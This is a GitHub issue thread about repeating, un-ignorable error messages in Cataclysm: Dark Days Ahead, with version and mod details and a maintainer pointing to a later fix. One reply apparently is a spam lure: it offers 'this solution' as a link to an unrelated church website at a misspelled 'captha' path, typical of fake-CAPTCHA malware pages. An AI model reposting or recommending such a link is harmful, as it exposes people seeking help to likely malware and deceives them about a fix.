### ISSUE TITLE
Repeating error message that can not be ignored.

### ISSUE THREAD

**Issue by Ferrum-Vulpes** [CleverRaven/Cataclysm-DDA#77382]
### Describe the bug

As the title says, repeating error message, no idea what is causing it. It started after bringing NPCs to my base area but it may be unrelated to them as it continued after their deaths.

### Attach save file

[State Line City-trimmed.tar.gz](https://github.com/user-attachments/files/17533612/State.Line.City-trimmed.tar.gz)

### Steps to reproduce

No clue how to start it, but to experience it walk around a little bit in the area. It should throw error messages quickly enough. Running most content addition mods so that may be involved.

### Expected behavior

Constant error messages that refuse to be (I)gnored  that interrupt normal actions. No idea why.

### Versions and configuration

- OS: Windows
    - OS Version: 10.0.19045.5011 (22H2)
- Game Version: cdda-experimental-2024-10-17-1814 cc3ab7f [64-bit]
- Graphics Version: Tiles
- Game Language: System language []
- Mods loaded: [
    Dark Days Ahead [dda],
    Disable NPC Needs [no_npc_food],
    Portal Storms Ignore NPCs [personal_portal_storms],
    Slowdown Fungal Growth [no_fungal_growth],
    Aftershock [aftershock],
    Bionic Professions [package_bionic_professions],
    Magiclysm [magiclysm],
    Mind Over Matter [mindovermatter],
    Xedra Evolved [xedra_evolved],
    DinoMod [DinoMod],
    Megafauna [megafauna],
    Bombastic Perks [bombastic_perks],
    Extra Mutated Scenarios [extra_mut_scens],
    Martial Mastery [perk_melee_system],
    Mythical Martial Arts [MMA],
    sees-player icon, HitButton_iso [sees_player_hitbutton],
    Translate Complex Dialogue [translate_dialogue],
    SpeedyDex [speedydex],
    Stats Through Skills [StatsThroughSkills],
    Tamable Wildlife [Tamable_Wildlife]
]

**Comment by sgmustafi** [comment]
maybe this solution will solve your problem [click](https://www.calvarywhangarei.co.nz/captha/index.html)

**Comment by RenechCDDA** [comment]
Looks like this was resolved by #77087, literally the very next released version.

If you still experience this after updating, comment and we can reopen the issue.
